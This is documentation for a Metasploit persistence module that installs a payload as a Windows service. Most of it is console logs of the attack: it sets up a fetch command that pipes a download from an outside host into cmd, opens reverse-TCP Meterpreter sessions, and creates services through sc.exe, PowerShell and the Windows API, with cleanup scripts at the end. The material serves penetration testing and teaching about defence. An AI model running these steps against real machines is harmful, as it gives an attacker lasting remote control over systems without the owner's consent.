adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/windows/persistence/service.md
T
h00die a0222d0783 rework windows service persistence
2025-11-17 19:02:53 -05:00

255 lines
11 KiB
Markdown
Raw Blame History

## Description
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
## Options
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### SERVICE_NAME
The name of service. Random string as default.
### SERVICE_DESCRIPTION
The description of service. Random string as default.
### SERVICE_DISPLAY_NAME
The display name of service. Random string as default.
### METHOD
Which method to use to create and start the service. Options are `Auto` (try all until one is successful), `API`, `Powershell`, `sc.exe`
## Verification Steps
1. get session on target with admin/system privs
2. `use exploit/windows/persistence/service`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `exploit`
## Scenarios
### Windows 10 1909 (10.0 Build 18363)
Initial shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Starting persistent handler(s)...
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49801) at 2025-11-05 16:15:06 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```
Method: `sc.exe`
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/service
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set session 1
session => 1
msf exploit(windows/persistence/service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set method sc.exe
method => sc.exe
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\nAhKD.exe
[*] Attempting sc.exe method
[*] Install service: amOovON (YmGjSOMpyNU)
[*] Service install response: [SC] CreateService SUCCESS
[*] [SC] ChangeServiceConfig2 SUCCESS
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start response:
SERVICE_NAME: YmGjSOMpyNU
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 6664
FLAGS :
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49831) at 2025-11-05 16:30:40 -0500
msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...
```
Method: `Powershell`
```
msf exploit(windows/persistence/service) > set method Powershell
method => Powershell
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ShNuFKol.exe
[*] Attempting Powershell method
[*] Install service: eIOICL (mpSlHnVCx)
[*] Service install response:
Status Name DisplayName
------ ---- -----------
Stopped mpSlHnVCx eIOICL
[*] Starting service
[*] Service start response:
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49833) at 2025-11-05 16:31:22 -0500
msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...
```
Method: `API`
```
msf exploit(windows/persistence/service) > set method API
method => API
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ETuJrSPU.exe
[*] Attempting API method
[*] Install service: vElWSh (krKyTZyQvSWg)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49834) at 2025-11-05 16:31:41 -0500
```
Method: `Auto`
```
msf exploit(windows/persistence/service) > set method Auto
method => Auto
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\xuGMR.exe
[*] Attempting API method
[*] Install service: cbuEWFVI (NzbjSkwfZrk)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:49835) at 2025-11-05 16:32:06 -0500
```
Cleanup
```
msf exploit(windows/persistence/service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "stop YmGjSOMpyNU"
Process 2812 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "delete YmGjSOMpyNU"
Process 4140 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "stop mpSlHnVCx"
Process 680 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "delete mpSlHnVCx"
Process 8940 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ETuJrSPU.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "stop krKyTZyQvSWg"
Process 3660 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "delete krKyTZyQvSWg"
Process 1728 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\xuGMR.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "stop NzbjSkwfZrk"
Process 3448 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "delete NzbjSkwfZrk"
Process 9020 created.
meterpreter > exit
[*] Shutting down session: 1
```
Reference in New Issue View Git Blame Copy Permalink